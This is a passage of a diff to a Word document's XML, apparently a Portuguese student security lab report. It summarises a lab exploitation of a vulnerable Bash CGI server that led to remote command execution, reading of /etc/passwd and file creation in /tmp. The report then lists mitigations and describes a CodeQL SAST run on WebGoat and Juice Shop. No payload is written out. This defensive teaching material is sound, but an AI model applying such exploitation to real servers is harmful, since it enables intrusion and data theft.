-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Execução remota de comandos com os privilégios do processo web → </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>exfiltração</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> de informação e criação de ficheiros.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ParaContinue"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="19"/>
-        </w:numPr>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>Persistência via criação de ficheiros em /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>tmp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (ver figura evidence_file_existence_and_content.jpg).</w:t>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>Persistência via criação de ficheiros em /tmp (ver figura evidence_file_existence_and_content.jpg).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4062,21 +2495,7 @@
         <w:rPr>
           <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve">Atualizar o pacote </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>bash</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> para versão corrigida</w:t>
+        <w:t>Atualizar o pacote bash para versão corrigida</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4144,21 +2563,7 @@
         <w:rPr>
           <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve">Executar serviços web com privilégios mínimos (não </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>root</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>).</w:t>
+        <w:t>Executar serviços web com privilégios mínimos (não root).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4208,19 +2613,7 @@
         <w:rPr>
           <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve">Política de testes periódicos e </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>atualizações</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> regulare</w:t>
+        <w:t>Política de testes periódicos e atualizações regulare</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4241,21 +2634,8 @@
       <w:pPr>
         <w:pStyle w:val="Head2"/>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Conclusão</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> da </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Parte</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> 1</w:t>
+      <w:r>
+        <w:t>Conclusão da Parte 1</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4270,105 +2650,7 @@
         <w:rPr>
           <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve">A exploração demonstrou, de forma prática, que um servidor que use </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>Bash</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> vulnerável em CGI pode executar comandos remotos, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>exfiltrar</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> ficheiros e criar artefactos no sistema. As evidências (excerto de /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>etc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>passwd</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>, capturas da criação e verificação do ficheiro em /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>tmp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, e exemplos de </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>getenv.cgi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">) foram inseridas ao longo do texto para facilitar a leitura e validação. Recomenda-se a aplicação imediata das </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>mitigaçãoes</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> acima e a integração de verificações SAST/DAST regulares no ciclo de desenvolvimento.</w:t>
+        <w:t>A exploração demonstrou, de forma prática, que um servidor que use Bash vulnerável em CGI pode executar comandos remotos, exfiltrar ficheiros e criar artefactos no sistema. As evidências (excerto de /etc/passwd, capturas da criação e verificação do ficheiro em /tmp, e exemplos de getenv.cgi) foram inseridas ao longo do texto para facilitar a leitura e validação. Recomenda-se a aplicação imediata das mitigaçãoes acima e a integração de verificações SAST/DAST regulares no ciclo de desenvolvimento.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4403,21 +2685,8 @@
       <w:pPr>
         <w:pStyle w:val="Head2"/>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>CodeQL</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> — </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>execução</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> local (SAST)</w:t>
+      <w:r>
+        <w:t>CodeQL — execução local (SAST)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4440,7 +2709,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -4450,7 +2718,6 @@
         </w:rPr>
         <w:t>Objetivo</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4464,37 +2731,8 @@
         <w:rPr>
           <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve">O objetivo desta etapa foi instalar e usar o </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>CodeQL</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> para analisar código-fonte de aplicações deliberadamente vulneráveis (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>ex</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">: </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t xml:space="preserve">O objetivo desta etapa foi instalar e usar o CodeQL para analisar código-fonte de aplicações deliberadamente vulneráveis (ex: </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -4503,95 +2741,40 @@
         </w:rPr>
         <w:t>WebGoat</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> e </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
         </w:rPr>
-        <w:t>Juice</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>Juice Shop</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">), identificar padrões de vulnerabilidade (ex: </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
         </w:rPr>
+        <w:t>hardcoded credentials</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>Shop</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>), identificar padrões de vulnerabilidade (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>ex</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">: </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>hardcoded</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>credentials</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
@@ -4602,21 +2785,7 @@
         <w:rPr>
           <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> CWE-798) e compreender os resultados produzidos pelas </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>queries</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> predefinidas.</w:t>
+        <w:t xml:space="preserve"> CWE-798) e compreender os resultados produzidos pelas queries predefinidas.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4635,10 +2804,10 @@
           <w:bCs w:val="0"/>
           <w:i w:val="0"/>
           <w:iCs/>
+          <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -4646,392 +2815,233 @@
           <w:i w:val="0"/>
           <w:iCs/>
         </w:rPr>
-        <w:t>Preparação</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
+        <w:t>Preparação e comandos essenciais</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>Passos principais</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (resumo prático):</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>Instalar a extensão CodeQL no Visual Studio Code e o CLI CodeQL no sistema.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>Fazer clone do repositório alvo</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>Criar a base de dados CodeQL</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>Abrir o workspace do CodeQL starter no VS Code e carregar a base de dados criada para executar consultas.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Para"/>
+        <w:ind w:left="720" w:firstLine="0"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>(COLOCAR IMAGEM DE EXEMPLO)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>screenshot do resultado da query HardcodedPasswordField.ql mostrando a entrada JWTRefreshEndpoint.java</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Head3"/>
         <w:rPr>
           <w:b/>
           <w:bCs w:val="0"/>
           <w:i w:val="0"/>
           <w:iCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> e </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs w:val="0"/>
           <w:i w:val="0"/>
           <w:iCs/>
-        </w:rPr>
-        <w:t>comandos</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Resultados: hardcoded credential (JWT) </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs w:val="0"/>
           <w:i w:val="0"/>
           <w:iCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">- </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs w:val="0"/>
           <w:i w:val="0"/>
           <w:iCs/>
-        </w:rPr>
-        <w:t>essenciais</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ParaContinue"/>
-        <w:ind w:firstLine="0"/>
-        <w:rPr>
-          <w:lang w:eastAsia="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Passos </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>principais</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>resumo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>prático</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>):</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ParaContinue"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="21"/>
-        </w:numPr>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Instalar a extensão </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>CodeQL</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> no Visual </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>Studio</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>Code</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> e o CLI </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>CodeQL</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> no sistema.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ParaContinue"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="21"/>
-        </w:numPr>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>Fazer clone do repositório alvo</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ParaContinue"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="21"/>
-        </w:numPr>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Criar a base de dados </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>CodeQL</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ParaContinue"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="21"/>
-        </w:numPr>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Abrir o </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>workspace</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> do </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>CodeQL</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>starter</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> no VS </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>Code</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> e carregar a base de dados criada para executar consultas.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Para"/>
-        <w:ind w:left="720" w:firstLine="0"/>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
